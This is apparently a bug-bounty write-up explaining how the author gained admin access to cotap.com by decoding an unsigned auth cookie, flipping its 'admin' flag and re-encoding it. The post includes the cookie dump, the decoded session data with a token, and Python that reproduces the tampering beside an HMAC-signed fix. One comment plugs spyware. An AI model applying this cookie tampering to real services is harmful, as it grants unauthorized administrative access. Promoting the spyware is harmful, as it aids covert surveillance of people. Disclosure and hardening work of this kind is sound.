
Cotap Admin Panel Takeover

Dipak Kumar Das
Estimated read time: 5 min
Once I was invited to a HackerOne private program. Here is one bug I found in Cotap.

So let's start.
Whenever I get a new target I do a quick subdomain enumeration. For subdomain scanning you can use some great tools like knock or this online tool.

After the subdomain scan I found the subdomain admin.cotap.com.
When I visited admin.cotap.com it redirected me to app.cotap.com, which is the normal user interface, so no problem there.

So then I thought about how to get into the admin panel. I tried a lot but failed.

After a few days I was testing it again, this time as a normal user. I exported the cookies and found this.
Here is the active user session cookie export:
[
{
"domain": ".cotap.com",
"expirationDate": 1504556226,
"hostOnly": false,
"httpOnly": false,
"name": "ga",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "GA1.2.1098904338.1441483504",
"id": 1
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_anonymous_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%227641cefa-af44-46b3-90e5-6b7df324bc86%22",
"id": 2
},
{
"domain": ".cotap.com",
"expirationDate": 1473020144,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_group_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "null",
"id": 3
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_user_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%22test%40armyspy.com%22",
"id": 4
},
{
"domain": ".cotap.com",
"expirationDate": 1756844163,
"hostOnly": false,
"httpOnly": false,
"name": "amplitude_idcotap.com",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "eyJkZXZpY2VJZCI6IjA4MWUwNjg0LTlmZWUtNDBmOC04OWZiLWVkZjFkMTI5NjJlZCIsInVzZXJJZCI6bnVsbCwib3B0T3V0IjpmYWxzZX0=",
"id": 5
},
{
"domain": ".cotap.com",
"expirationDate": 2072204226,
"hostOnly": false,
"httpOnly": false,
"name": "cotap:auth",
"path": "/",
"secure": true,
"session": false,
"storeId": "0",
"value": "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",
"id": 6
},
{
"domain": "app.cotap.com",
"expirationDate": 1473020194,
"hostOnly": true,
"httpOnly": false,
"name": "mp_7a46f06059cd77ff0cf1576eedb16eb3_mixpanel",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%7B%22distinct_id%22%3A%20%22test%40armyspy.com%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%2C%22mp_name_tag%22%3A%20%22test%40armyspy.com%22%2C%22id%22%3A%20%22test%40armyspy.com%22%2C%22%24email%22%3A%20%22test%40armyspy.com%22%7D",
"id": 7
},
{
"domain": "app.cotap.com",
"expirationDate": 1911844800,
"hostOnly": true,
"httpOnly": false,
"name": "pnctest",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "1",
"id": 8
}
]

The cookie named "cotap:auth" contains this value:

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

From its character set you can guess that it is Base64-encoded.

So here is what I did:

Step 1: Base64-decode the value, which gives a URL-encoded string:

%7B%22talker%22%3A%7B%22id%22%3A48033392%2C%22address%22%3A%22test%40armyspy.com%22%2C%22personal_address%22%3Atrue%2C%22verified%22%3Atrue%2C%22first_name%22%3A%22hello%22%2C%22last_name%22%3A%22me%22%2C%22avatar_url%22%3Anull%2C%22notification_method%22%3A%22email%22%2C%22username%22%3Anull%2C%22timestamp%22%3A%222015-09-05T03%3A53%3A30.235Z%22%2C%22registered%22%3Atrue%2C%22premium%22%3Afalse%2C%22admin%22%3Afalse%2C%22permissions%22%3A%7B%22disable_conversation_sharing%22%3Afalse%2C%22remove_participants%22%3Afalse%2C%22files%22%3Atrue%2C%22premium_files%22%3Afalse%2C%22rating_reminder%22%3Afalse%2C%22place_video_calls%22%3Afalse%7D%2C%22phone_number%22%3Anull%7D%2C%22address%22%3A%22test%40armyspy.com%22%2C%22scope%22%3A%22web%22%2C%22supported_schemes%22%3A%5B%22code_mode%22%5D%2C%22access_token%22%3A%2283126cce16360467cc9b2e627e8aadf3%22%2C%22state%22%3A%22verified%22%2C%22scheme%22%3A%7B%22type%22%3A%22code_mode%22%2C%22confirm_address%22%3Afalse%2C%22require_profile%22%3Afalse%7D%2C%22code%22%3A%223226%22%2C%22pubnub_channel%22%3A%22e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47%22%7D
Step 2: URL-decode the result, which gives plain JSON:

{"talker":{"id":48033392,"address":"test@armyspy.com","personal_address":true,"verified":true,"first_name":"hello","last_name":"me","avatar_url":null,"notification_method":"email","username":null,"timestamp":"2015-09-05T03:53:30.235Z","registered":true,"premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false},"phone_number":null},"address":"test@armyspy.com","scope":"web","supported_schemes":["code_mode"],"access_token":"83126cce16360467cc9b2e627e8aadf3","state":"verified","scheme":{"type":"code_mode","confirm_address":false,"require_profile":false},"code":"3226","pubnub_channel":"e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47"}
Step 3: Change every false to true in this part of the JSON, in particular "admin":false:
premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false}
(in those parameters, change false to true)

Step 4: After changing false to true, URL-encode and then Base64-encode the JSON again, replace the old value of cotap:auth with the new one, import the cookie into the normal user interface at app.cotap.com, and visit admin.cotap.com.

And finally I was logged in as admin. The root cause is that the server read the admin flag from a client-side cookie that carried no integrity protection, so any user could rewrite it.
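As an added example (not code from the post, and not Cotap's own code), the following Python reproduces the cookie layout the steps above describe (JSON, URL-encoded, then Base64), shows the vulnerable check that reads the admin flag straight from the cookie, and puts an HMAC-signed variant beside it that rejects a cookie whose payload was modified. The session values, the server key and all function names are assumptions.

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import quote, unquote

# Constructed sample in the shape of the decoded cotap:auth cookie from the post;
# every value is a placeholder, not the real session data.
SAMPLE_SESSION = {
    "talker": {
        "id": 1,
        "address": "user@example.test",
        "admin": False,
        "premium": False,
        "permissions": {"files": True, "place_video_calls": False},
    },
    "address": "user@example.test",
    "scope": "web",
    "access_token": "PLACEHOLDER_ACCESS_TOKEN",
}

# Hypothetical server-side secret; a real deployment loads it from a key store.
SERVER_KEY = b"placeholder-server-secret-key"


def encode_unsigned(session):
    """Cookie layout described in the post: JSON -> URL-encode -> Base64 (no integrity)."""
    url_encoded = quote(json.dumps(session, separators=(",", ":")), safe="")
    return base64.b64encode(url_encoded.encode()).decode()


def decode_unsigned(cookie):
    """Reverse of encode_unsigned; trusts whatever the client sent."""
    return json.loads(unquote(base64.b64decode(cookie).decode()))


def is_admin_unsigned(cookie):
    """The vulnerable check: authorization read from client-controlled data."""
    return decode_unsigned(cookie)["talker"]["admin"] is True


def set_admin_flag(cookie, value):
    """Rewrite the admin flag in an unsigned cookie (the edit the post performs)."""
    session = decode_unsigned(cookie)
    session["talker"]["admin"] = value
    return encode_unsigned(session)


def encode_signed(session, key):
    """Tamper-evident variant: append an HMAC-SHA256 tag over the encoded payload."""
    payload = encode_unsigned(session)
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def decode_signed(cookie, key):
    """Return the session only if the tag verifies; None for tampered or malformed cookies."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return decode_unsigned(payload)


def is_admin_signed(cookie, key):
    """Hardened check: the flag is read only from a cookie whose tag verifies."""
    session = decode_signed(cookie, key)
    return session is not None and session["talker"]["admin"] is True


def tamper_signed(cookie, value):
    """Edit the payload of a signed cookie while keeping the old tag (no key needed)."""
    payload, _, tag = cookie.rpartition(".")
    return f"{set_admin_flag(payload, value)}.{tag}"


if __name__ == "__main__":
    unsigned = encode_unsigned(SAMPLE_SESSION)
    print("unsigned, flag flipped, accepted:", is_admin_unsigned(set_admin_flag(unsigned, True)))
    signed = encode_signed(SAMPLE_SESSION, SERVER_KEY)
    print("signed, flag flipped, accepted:", is_admin_signed(tamper_signed(signed, True), SERVER_KEY))
```

The signed variant only makes the cookie tamper-evident; it still ships the authorization decision to the client. The stronger design keeps the session identifier in the cookie and looks up `admin` and `permissions` server-side on every request, so that there is nothing in the cookie worth editing.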


PoC images:

Thanks

Suggestions and feedback are welcome.

  





6 comments

  1. second ago
    Nice one..
    1. second ago
      Thq bro :)
  2. second ago
    Nice finding.. How much reward did you get for this bug?
    1. second ago
      Sorry, it's private.
  3. second ago
    nice catch (y)
  4. second ago
    Take a look at thetruthspy to understand how great to spy on somebody.
© 2025 ADDICTIVE HACKERS. All rights reserved.
